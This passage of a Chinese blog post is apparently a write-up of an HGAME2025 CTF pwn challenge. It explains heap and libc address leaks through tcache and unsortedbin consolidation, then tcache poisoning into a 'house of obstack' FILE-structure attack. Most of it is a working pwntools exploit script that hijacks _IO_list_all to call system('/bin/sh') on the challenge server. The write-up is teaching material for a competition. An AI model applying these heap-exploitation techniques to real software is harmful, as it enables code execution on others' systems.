<p>这题因为info块里存着下一个堆块的地址，我就直接使用堆风水来泄露heap的地址了。就是将一个free后的info块，让它以data块的身份被申请出来，就可以直接泄露出heap的地址了。</p>
<p>有了heap的地址，现在还剩libc的地址。泄露libc地址常用的方式是利用largebin和unsortedbin。</p>
<p>这题largebin不太好弄，只能使用unsortedbin。但是unsortedbin也不好直接使用，首先因为存在tcache，程序取堆块会先从tcache里取，tcache空后也会先将unsortedbin里的堆块放入tcache中，再取出，这样会导致fd和bk指针被清空从而无法泄露libc地址。</p>
<p>所以我们就想到利用consolidate（关于这个机制可以看看这篇文章：<a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_41453285/article/details/97627411">堆漏洞挖掘中的malloc_consolidate与FASTBIN_CONSOLIDATION_THRESHOLD</a>。</p>
<p>为了利用这个机制，我们需要一个可以切割的unsortedbin。这个时候，我们想到了edit这个函数，它会先free掉data块，再重新malloc一个块。那么我们可以edit一个堆块，让它的data块的大小和之前不同，就可以在后面重新得到一个data块。之后再edit另一个堆块，我们就可以得到两个相邻的大堆块了，然后free掉这两个堆块，再add时，这两个堆块会合并，加入到unsortedbin里，然后就可以进行分割，从而泄露出libc地址了。</p>
<p>之后就是任意地址free，利用tcache poisoning打house of obstack了。</p>
<p>exp：</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br></pre></td><td class="code"><pre><code class="hljs routeros"><span class="hljs-keyword">from</span> pwn import *<br><br>context(log_level = <span class="hljs-string">&#x27;debug&#x27;</span>)<br><br><span class="hljs-comment">#io = process(&quot;./vuln&quot;)</span><br>io = remote(<span class="hljs-string">&quot;node1.hgame.vidar.club&quot;</span>,30436)<br>elf = ELF(<span class="hljs-string">&quot;./vuln&quot;</span>)<br>libc = ELF(<span class="hljs-string">&quot;./libc.so.6&quot;</span>)<br><br>def <span class="hljs-built_in">add</span>(number,name,size,content):<br>    io.sendlineafter(b<span class="hljs-string">&#x27;&gt;&#x27;</span>,b<span class="hljs-string">&#x27;1&#x27;</span>)<br>    io.sendlineafter(b<span class="hljs-string">&#x27;&gt;&#x27;</span>,str(number))<br>    io.sendlineafter(b<span class="hljs-string">&#x27;&gt;&#x27;</span>,name)<br>    io.sendlineafter(b<span class="hljs-string">&#x27;&gt;&#x27;</span>,str(size))<br>    io.sendafter(b<span class="hljs-string">&#x27;&gt;&#x27;</span>,content)<br><br>def dele(index):<br>    io.sendlineafter(b<span class="hljs-string">&#x27;&gt;&#x27;</span>,b<span class="hljs-string">&#x27;2&#x27;</span>)<br>    io.sendlineafter(b<span class="hljs-string">&#x27;&gt;&#x27;</span>,str(index))<br><br>def <span class="hljs-built_in">edit</span>(index,number,name,size,content):<br>    io.sendlineafter(b<span class="hljs-string">&#x27;&gt;&#x27;</span>,b<span class="hljs-string">&#x27;3&#x27;</span>)<br>    io.sendlineafter(b<span class="hljs-string">&#x27;&gt;&#x27;</span>,str(index))<br>    io.sendlineafter(b<span class="hljs-string">&#x27;&gt;&#x27;</span>,str(number))<br>    io.sendlineafter(b<span class="hljs-string">&#x27;&gt;&#x27;</span>,name)<br>    io.sendlineafter(b<span class="hljs-string">&#x27;&gt;&#x27;</span>,str(size))<br>    io.sendafter(b<span class="hljs-string">&#x27;&gt;&#x27;</span>,content)<br><br>def show(index):<br>    io.sendlineafter(b<span class="hljs-string">&#x27;&gt;&#x27;</span>,b<span class="hljs-string">&#x27;4&#x27;</span>)<br>    io.sendlineafter(b<span class="hljs-string">&#x27;&gt;&#x27;</span>,str(index))<br><br><span class="hljs-comment">#gdb.attach(io)</span><br><br>payload = p64(0)<span class="hljs-number">*3</span> + p64(0) + p64(0x101)<br><span class="hljs-built_in">add</span>(12345678,b<span class="hljs-string">&#x27;aaaaaaaa&#x27;</span>,0x80,payload)<br><span class="hljs-built_in">add</span>(12345678,b<span class="hljs-string">&#x27;aaaaaaaa&#x27;</span>,0x90,b<span class="hljs-string">&#x27;why&#x27;</span>) #0<br><span class="hljs-built_in">add</span>(12345678,b<span class="hljs-string">&#x27;zzzzzzzz&#x27;</span>,0x80,b<span class="hljs-string">&#x27;asdadad&#x27;</span>)<br><br>dele(0)<br>dele(1)<br><br><span class="hljs-built_in">add</span>(555555,b<span class="hljs-string">&#x27;a&#x27;</span><span class="hljs-number">*0</span>x8,0x20,b<span class="hljs-string">&#x27;b&#x27;</span><span class="hljs-number">*0</span>x10) #1<br><br>show(1)<br>io.recvuntil(b<span class="hljs-string">&#x27;b&#x27;</span><span class="hljs-number">*0</span>x10)<br>heap_addr = u64(io.recv(6).ljust(8,b<span class="hljs-string">&#x27;\x00&#x27;</span>)) - 0x2d0<br><span class="hljs-built_in">print</span>(hex(heap_addr))<br><br><span class="hljs-built_in">add</span>(12345678,b<span class="hljs-string">&#x27;aaaaaaaa&#x27;</span>,0x380,b<span class="hljs-string">&#x27;a&#x27;</span>) #2<br><span class="hljs-built_in">add</span>(12345678,b<span class="hljs-string">&#x27;aaaaaaaa&#x27;</span>,0x380,b<span class="hljs-string">&#x27;a&#x27;</span>) #3<br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> range(7):<br>    <span class="hljs-built_in">add</span>(12345678,b<span class="hljs-string">&#x27;aaaaaaaa&#x27;</span>,0x3a0,b<span class="hljs-string">&#x27;a&#x27;</span>)<br><br><span class="hljs-comment">#pause()</span><br><br><span class="hljs-built_in">edit</span>(2,12345678,b<span class="hljs-string">&#x27;0&#x27;</span>,0x3a0,b<span class="hljs-string">&#x27;a&#x27;</span>)<br><span class="hljs-built_in">edit</span>(3,12345678,b<span class="hljs-string">&#x27;0&#x27;</span>,0x3a0,b<span class="hljs-string">&#x27;a&#x27;</span>)<br><span class="hljs-built_in">add</span>(12345678,b<span class="hljs-string">&#x27;aaaaaaaa&#x27;</span>,0x20,b<span class="hljs-string">&#x27;z&#x27;</span>)<br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> range(7):<br>    dele(10-i)<br>dele(2)<br>dele(2)<br><span class="hljs-built_in">add</span>(12345678,b<span class="hljs-string">&#x27;a&#x27;</span>,0x200,b<span class="hljs-string">&#x27;\xe0&#x27;</span>)<br>show(3)<br><br>io.recvuntil(b<span class="hljs-string">&#x27;Information: &#x27;</span>)<br>libc_base = u64(io.recv(6).ljust(8,b<span class="hljs-string">&#x27;\x00&#x27;</span>)) - 1376 - 0x21AC80<br><span class="hljs-built_in">print</span>(hex(libc_base))<br><span class="hljs-built_in">print</span>(hex(heap_addr))<br><br><span class="hljs-built_in">add</span>(12345678,b<span class="hljs-string">&#x27;aaaaaaaa&#x27;</span>,0x20,b<span class="hljs-string">&#x27;z&#x27;</span>)<br><span class="hljs-built_in">add</span>(12345678,b<span class="hljs-string">&#x27;aaaaaaaa&#x27;</span>,0x20,b<span class="hljs-string">&#x27;z&#x27;</span>)<br><span class="hljs-built_in"></span><br><span class="hljs-built_in">system </span>= libc_base + libc.symbols[<span class="hljs-string">&#x27;system&#x27;</span>]<br>bin_sh = libc_base + next(libc.search(b<span class="hljs-string">&#x27;/bin/sh\x00&#x27;</span>))<br>_IO_obstack_jumps = libc_base + 0x2173c0<br><br>payload5 = flat(<br>	&#123;<br>		0x18:1,<br>		0x20:0,<br>		0x28:1,<br>		0x30:0,<br>		0x38:p64(system),<br>		0x48:p64(bin_sh),<br>		0x50:1,<br>		0xd8:p64(_IO_obstack_jumps+0x20),<br>		0xe0:p64(heap_addr + 0x2990 + 0x10 + 0x8),<br>	&#125;,<br>	filler = <span class="hljs-string">&#x27;\x00&#x27;</span><br>)<br><br><span class="hljs-built_in">add</span>(12345678,b<span class="hljs-string">&#x27;aaaaaaaa&#x27;</span>,0x3f0,payload5)<br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> range(2):<br>    dele(0)<br><br>io.sendlineafter(b<span class="hljs-string">&#x27;&gt;&#x27;</span>,b<span class="hljs-string">&#x27;1&#x27;</span>)<br>io.sendlineafter(b<span class="hljs-string">&#x27;&gt;&#x27;</span>,str(123))<br>io.sendlineafter(b<span class="hljs-string">&#x27;&gt;&#x27;</span>,b<span class="hljs-string">&#x27;b&#x27;</span>)<br>io.sendlineafter(b<span class="hljs-string">&#x27;&gt;&#x27;</span>,str(-9))<br><br>payload1 = heap_addr + 0x300<br>payload1 = hex(payload1).encode()<br><br>io.recvuntil(b<span class="hljs-string">&#x27;&gt;&#x27;</span>)<br><span class="hljs-built_in">print</span>(payload1)<br>io.sendline(payload1)<br><br>IO_list_all = libc_base + libc.symbols[<span class="hljs-string">&#x27;_IO_list_all&#x27;</span>] - 0x10<br>fd = (heap_addr &gt;&gt; 12) ^ IO_list_all<br>payload2 = p64(0)<span class="hljs-number">*10</span> + p64(0x31) + p64(fd)<br><span class="hljs-built_in">add</span>(12345678,b<span class="hljs-string">&#x27;aaaaaaaa&#x27;</span>,0xf0,payload2)<br><span class="hljs-built_in">add</span>(12345678,p64(heap_addr),0x20,p64(heap_addr) + p64(heap_addr + 0x2990 + 0x10 + 0x8))<br><br>io.sendlineafter(b<span class="hljs-string">&#x27;&gt;&#x27;</span>,b<span class="hljs-string">&#x27;5&#x27;</span>)<br><br>io.interactive()<br></code></pre></td></tr></table></figure>
                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>HGAME2025 pwn方向题解</div>
      <div>http://whi4ed0g.xyz/2025/02/25/HGAME2025-pwn方向题解/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>whi4ed0g</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2025年2月25日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
